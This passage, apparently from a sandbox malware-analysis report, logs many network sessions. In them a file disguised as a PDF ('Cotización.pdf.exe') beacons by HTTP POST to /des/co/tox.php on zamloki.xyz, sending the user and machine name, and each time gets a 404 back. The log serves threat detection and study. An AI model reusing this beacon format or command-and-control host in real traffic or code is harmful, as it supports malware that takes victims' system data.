                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:20.813848019 CEST5851INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:20 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=U5zQAoiGlXXDYeRanCSy8EZjVZ%2BPDBbzwPHPxwZQJc8ahQKbKUwxg5Zi9KWgmOnpIT9uUeMLSyGU%2F4b3BsEtu8ml%2BOKipETBguk%2B8STdQ5%2FK2yjKEyHb6YU%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2651c49f70eaf-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      55192.168.2.349789172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:21.063344002 CEST5852OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:21.083803892 CEST5853OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:21.338546991 CEST5853INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:21 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ZczkwqshaIBzdWlUBnjbbfTukya9NhRRqlDA8HYEsuue9CsjCBdauHV42ybqX%2Fks9ICd47Os%2FGIQ%2F9KJMlEEr4%2Fcug8Rz4aAqT4curv0wBJH%2B%2FK9lMUPT6c%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2651fb889074a-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      56192.168.2.349790172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:21.652029991 CEST5854OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:21.674400091 CEST5854OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:21.916270018 CEST5855INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:21 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Qs24QMO8UIqgcpvLf0H%2BRwLkGMYSfDumZHcrFFlURRzaLdB2qPUbdvY3i0afo%2F6Ahka%2BsUw%2B%2Bfvhiq7Ve8DP5mNaSFDVESTNPGcSg3zKgyMztaX%2BUQHDzDs%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265236b7605d0-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      57192.168.2.349791104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:22.178744078 CEST5856OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:22.197745085 CEST5856OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:22.438235998 CEST5857INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:22 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tQLsO6z%2FZ0SQogrWedaOMzjXqUchrdYOj19yw%2F7r2yQ%2FdHBpP%2Bdskc2KoUb2Qf6%2F5lLLwiyvbnDTZld%2Fvn5IEUwPJCGLJbYthkqeagw%2BkNW55rfpfQg62zhlRswfKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26526a93bc2e0-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      58192.168.2.349792172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:22.680957079 CEST5858OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:22.701060057 CEST5858OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:22.949904919 CEST5859INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:22 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=AsFGhlTgEjC2EwXPJWTG%2Bk6%2FKAkE4A5I9jmm32Px%2FIb3EVqvKrhFvMes%2F5ULKv%2BqrJIVN%2B%2FQzYxPeurMrxGdL50nRTbgLxKxMD6abb%2FtTwaEEwU%2BwdoHq%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26529d94e2bd6-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      59192.168.2.349793172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:23.184833050 CEST5860OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:23.202882051 CEST5860OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:23.463911057 CEST5861INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:23 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ckR1Dp8ZVUUvEwgcX%2BtG0ffvjl48UPyXqvieuSuAfwRgRgn79Q6G4XQ%2F%2F4PM6WkrKOHLY9sTaTvvyXNskcIgJgy65iywZ80rrjVm8fBpK%2B78I6yLj%2BdDghY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2652cfcdc4ece-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      6192.168.2.349731172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:51.536429882 CEST1378OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:51.558626890 CEST1379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:51.814811945 CEST1379INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:51 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=T9kMbeAc3L0KhaIptSS17aSskBEDvYqJwj5N8WOAdGXk3EYKa%2BIwkcClm1hJkh8uoJNxutBOwtMWNi0eB29xrZY27koXuh6e1LqRXBk8F8itAmHsAlO2OXQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2646748824e07-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      60192.168.2.349794104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:23.719947100 CEST5862OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:23.743494034 CEST5862OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:24.006592035 CEST5863INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:23 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BEaTrX1lOnl%2B7%2BMTWKVjpj28PmTdwuN8GYJG2UheOx2CLfXqV2aMYQx0G3mRVIK6S0imkgd%2By4tTyH7JdQ4m%2Bw51GH6xex6m2%2BXd95OFk%2F1okf9SYNoFWVs%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265305e002b1e-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      61192.168.2.349795172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:24.247620106 CEST5863OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:24.265450001 CEST5864OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:24.514328003 CEST5864INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:24 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze4Kjla8lwJzFehJVIYk1%2FM%2FekYvX1W4pwiMLmTDJEk%2FAD68r%2BiD08HsUJ4vgz5XsOAse570uSqc28W%2BVksxH1sILOI5GtuLq3bUPtb9p%2Fba0SJheqmgwMIYmdNVJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265339ef0973c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      62192.168.2.349796172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:24.786585093 CEST5865OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:24.807315111 CEST5866OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:25.048149109 CEST5866INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:25 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ntSW4QeQmfz5TTabaXqoxVxyRCihgXDf1qPFNFwMBX8eKRxLqegpuBvZ66%2BAcPIMR7k5oH8h%2FntNvCZMZk%2FHXsM7sAqxeYvXWYWx7SkBBeRys4EqGGeMMBY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26536f92ad6b1-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      63192.168.2.349797104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:25.284023046 CEST5867OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:25.301985979 CEST5867OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:25.568579912 CEST5868INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:25 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Y7%2BRevx%2Brl9mhk3O7p2O%2FfzL0G0UNmdNMobiOIF59qu7fBY%2F3Aj6hq7d61TfsTqJFHovZ0%2BSssN8suYC5uyY7U%2BlTGrfzrx4AptT6bELQzG6diM6BalXwOY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2653a1a0c4db2-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      64192.168.2.349798172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:25.779167891 CEST5869OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:25.800865889 CEST5869OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:26.108376980 CEST5870INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kr2RcvyKlvzXZRxgwE9xoeMeShKPdgDCmx5UC78qWouNCYgcHBrNXEjaD422wmWofaq7Z4Kvg4MN2Ff54mbNZotKPbFNCzHvv4b%2BRw8DKhiUsueI0pSuR34%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2653d3819c27c-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      65192.168.2.349799104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:26.353667021 CEST5871OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:26.374852896 CEST5871OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:26.622267962 CEST5872INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kVimQtpuQR68AxzU9mTYtWDyyjNAW6LhTnC7l6Hrq9WILDxO9E1AWsxB4nKHQeurqqfQVmg9soeKsh%2Fee8nC7w9ne1VzZ460PJFcLvpSoAqfkKCumm4eGzCXBXW81A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26540ca5b177e-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      66192.168.2.349800104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:26.904175043 CEST5873OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:26.930766106 CEST5873OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:27.186609030 CEST5874INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:27 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=q3rogP3C%2FrGlbGE6NuDLjc1eTY7YdhzUlWKSLKq%2FmvkCRWA9MCZrODBoko6BDoBWnvSFAe2MMtXXuJ%2BaoULNhptVhWRFQJpFOdHbZM6Ul3jJ%2BcSdx5G5iNY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265443f8505f9-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      67192.168.2.349801172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:27.448158979 CEST5875OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
